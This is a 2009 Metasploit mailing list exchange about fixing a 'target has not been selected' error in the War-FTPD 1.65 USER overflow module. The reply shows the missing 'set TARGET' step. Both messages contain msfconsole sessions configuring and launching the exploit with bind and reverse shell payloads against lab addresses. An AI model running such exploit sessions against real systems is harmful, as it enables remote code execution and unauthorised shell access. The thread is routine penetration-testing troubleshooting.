Metasploit mailing list archives

Re: Exploit failed: a target has not been selected


From: Anthony Sapozhnikov <anton.a.sa () gmail com>
Date: Wed, 28 Oct 2009 13:31:59 +0500

msf exploit(warftpd_165_user) > info

       Name: War-FTPD 1.65 Username Overflow
    Version: 7030
   Platform: Windows
 Privileged: No
    License: BSD License

Provided by:
  Fairuzan Roslan <riaf () mysec org>

Available targets:
  Id  Name
  --  ----
  0   Windows 2000 SP0-SP4 English
  1   Windows XP SP0-SP1 English
  2   Windows XP SP2 English

Basic options:
  Name     Current Setting      Required  Description
  ----     ---------------      --------  -----------
  FTPPASS  mozilla () example com  no        The password for the
specified username
  FTPUSER  anonymous            no        The username to authenticate as
  RHOST                         yes       The target address
  RPORT    21                   yes       The target port

Payload information:
  Space: 424
  Avoid: 4 characters

Description:
  This module exploits a buffer overflow found in the USER command of
  War-FTPD 1.65.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0256
  http://www.osvdb.org/875
  http://www.securityfocus.com/bid/10078
  http://milw0rm.com/metasploit/75
  http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html

msf exploit(warftpd_165_user) > set TARGET 0
TARGET => 0
msf exploit(warftpd_165_user) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(warftpd_165_user) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(warftpd_165_user) > exploit

[*] Started bind handler
[*] Connecting to FTP server 127.0.0.1:21...


2009/10/28 Jun Koi <junkoi2004 () gmail com>:
Hi,

I am running WarFtp 1.65 on Windows, and trying to exploit that with
the latest metasploit (SVN).
But I have the error "Exploit failed: a target has not been selected",
for no clear reason.

Any clue on how to fix this?

The result of "show options" seems to show that I use metasploit
correctly, like below.

Thanks,
Jun

-----
msf exploit(warftpd_165_user) > show options

Module options:

  Name     Current Setting      Required  Description
  ----     ---------------      --------  -----------
  FTPPASS  mozilla () example com  no        The password for the
specified username
  FTPUSER  anonymous            no        The username to authenticate as
  RHOST    10.0.0.5             yes       The target address
  RPORT    21                   yes       The target port


Payload options (windows/shell/reverse_nonx_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, process
  LHOST     10.0.0.2         yes       The local address
  LPORT     4444             yes       The local port

msf exploit(warftpd_165_user) > exploit

[-] Exploit failed: A target has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(warftpd_165_user) >
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




-- 
С уважением, Антон Сапожников.
mailto: Anton.Sapozhnikov () gmail com
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: